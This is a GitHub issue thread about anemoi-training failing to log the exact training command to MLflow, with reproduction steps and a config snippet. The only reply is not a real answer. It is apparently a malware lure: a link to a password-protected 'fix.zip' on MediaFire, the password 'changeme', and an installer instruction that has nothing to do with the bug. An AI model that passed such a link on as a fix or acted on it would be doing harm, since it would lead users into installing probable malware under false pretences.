### ISSUE TITLE
Anemoi-training command not captured by Mlflow

### ISSUE THREAD

**Issue by anaprietonem** [ecmwf/anemoi-training#39]
### What happened?

When running` anemoi-training train` with Mlflow logger activated it should be possible to capture the exact command used in mlflow. However currently that functionality seems to be broken, see below:
<img width="979" alt="Screenshot 2024-08-26 at 16 45 33" src="https://github.com/user-attachments/assets/80764435-6ef8-473a-9218-eda41b4f6a37">

Correct command should show:
` anemoi-training  train--config-name=ref_deterministic_0_3.yaml`

### What are the steps to reproduce the bug?

Run `anemoi-training --config-name=debug.yaml` (or any example config, making sure that:
```

diagnostics:
  log:
    mlflow:
      enabled: True
```

### Version

v0.1.0

### Platform (OS and architecture)

ATOS

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
